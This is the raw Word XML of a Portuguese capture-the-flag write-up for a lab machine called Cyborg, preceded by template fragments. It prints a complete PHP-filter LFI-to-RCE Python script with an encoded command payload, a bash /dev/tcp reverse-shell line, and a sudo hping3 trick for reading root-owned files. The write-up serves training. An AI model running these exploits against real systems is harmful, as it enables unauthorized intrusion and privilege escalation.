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BMPlexSans-bold.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSans-boldItalic.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSans-italic.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSans-regular.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSansSemiBold-bold.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSansSemiBold-boldItalic.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSansSemiBold-italic.ttf" ContentType="application/x-font-ttf"/>
  <Override PartName="/word/fonts/IBMPlexSansSemiBold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Se a máquina foi baseada em um pentest real, isso deve estar explícito nessa seção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do documento tem como objetivo descrever a etapa de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recon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portas abertas,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mapeamento de acessos com usuário convidado ou sem autenticação. </w:t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 Caso precise redimensionar a figura, é importante fazer pela sua diagonal, evitando que ela perca a formatação. É importante se atentar a fonte e ao tamanho utilizados: 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títulos, usar a formatação de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Título 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lado esquerdo da seleção de fonte. O título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Seminegrito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tamanho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textos e descrições, usar a formatação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Texto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ao lado esquerdo da seleção de fonte. O texto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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i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1 - Inserindo elemento de bloco de código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7lo9yejx6rr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identificadas na etapa anterior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usuário.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2 -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9olji020bts5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Movimentação lateral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é opcional e deve conter os passos de movimentação lateral para um usuário com mais permissões ou quando o CTF envolve uma etapa intermediária, como escapar de um container.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3 -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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ual3k3aqzn69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de escalação de privilégio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root.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4 -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Write-Up Cyborg</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Write-up cyborg</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>**Sobre Hacking Club**</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Hacking Club é uma plataforma para aprender segurança cibernética, um recurso incrível se você não sabe por onde começar. Além das máquinas vulneráveis, você tem acesso a aulas e desafios para praticar suas habilidades e acesso a uma comunidade exclusiva para jogar e se desafiar.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>A melhor parte do Hacking Club é que ele é muito prático. Se você é novo em hacking, experimente.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>**Varredura nmap:**</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Precisamos saber quais serviços estão sendo executados nos bastidores e quais portas estão abertas. Então, vamos usar uma ferramenta chamada nmap</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="9372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ap%25201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372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Podemos começar olhando o website que está sendo executado na porta 80:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="19367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67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Conforme vamos navegando pelo o website, podemos notar um comportamento de inclusão de páginas pelo o parâmetro page:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="22651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651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Conforme esse comportamento de inclusão de páginas podemos tentar abusar da vulnerabilidade de Local File Inclusion (LFI) utilizando o protocolo file://</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="20111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f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111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tentar ler alguns arquivos relevantes e tentar incluir um arquivo remotamente não obtivemos sucesso, aparentemente a diretiva PHP allow\url\fopen está desabilitada.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Após fazer umas pesquisas temos algo interessante LFI2RCE:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Podemos estar utilizando os filtros do php para gerar um conteúdo arbitrário como sáida.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Basicamente significa que podemos gerar código php arbitrário para a inclusão sem precisar escrevê-lo em um arquivo.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Para isso podemos estar utilizando o script abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>`import requests</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>url = "http://localhost/index.php"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>filetouse = "/etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>command = "/readflag"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>#&lt;?=`$GET[0]`;;?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>base64payload = "PD89YCRfR0VUWzBdYDs7Pz4"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>conversions = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'C': 'convert.iconv.UTF8.CSISO2022KR',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'s': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'d': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IECP271.UCS2'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>generate some garbage base64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>filters = "convert.iconv.UTF8.CSISO2022KR|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>filters += "convert.base64-encode|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>make sure to get rid of any equal signs in both the string we just generated and the rest of the file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>filters += "convert.iconv.UTF8.UTF7|"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>for c in base64payload[::-1]:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>filters += conversions[c] + "|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>decode and reencode to get rid of everything that isn't valid base64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>filters += "convert.base64-decode|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>filters += "convert.base64-encode|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>get rid of equal signs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>filters += "convert.iconv.UTF8.UTF7|"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>filters += "convert.base64-decode"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>finalpayload = f"php://filter/{filters}/resource={filetouse}"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>r = requests.get(url, params={</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>"0": command,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>"action": "include",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>"file": finalpayload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>print(r.text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Basicamente o objetivo do script é gerar uma string Base64 no início do arquivo que será finalmente decodificada fornecendo a carga desejada que será interpretada pelo o include.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Primeiro precisamos fazer algumas alterações no script, estarei mudando a url e o comando a ser executado:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="4568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8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Próxima alteração será excluir o parâmetro action e alterar o parâmetro file para page conforme a imagem abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="4405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d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05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Feito isso, podemos executar o script e logo em seguida recebemos o output do comando`id` :</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="5841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841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então pegar uma reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="7365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d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65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Ouvinte do netcat para receber a conexão:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="99718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cat%2520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971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 após executar o script recebemos a shell:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="10082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%25201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082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Atualizando shell simples para TTYs totalmente interativos:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="85559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y%2520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555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Listando o diretório / podemos encontrar a nossa primeira flag:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="90773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lag%2520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077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**Privesc**</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ao executar o comando `sudo -l` notamos que temos as permissões de executar o comando `/usr/sbin/hping3 --icmp *` com as permissões do usuário root sem precisar fornecer a senha do mesmo:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="86069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do%252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606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aproveitar essas permissões para podermos ler a última flag que se encontra no diretório `/root` .</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Primeiro podemos pegar outra shell e executar o seguinte comando abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo /usr/sbin/hping3 --icmp 127.0.0.1 --listen signature --safe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="84282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g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428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Na outra shell vamos executar o comando abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo /usr/sbin/hping3 --icmp 127.0.0.1 -d 100 -c 2 --sign signature --file /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="99143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g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914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 após executar o comando acima, recebemos a última flag na outra shell:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="102258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%2520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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnw61nncct6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&lt;NOME_DA_MÁQUINA&gt;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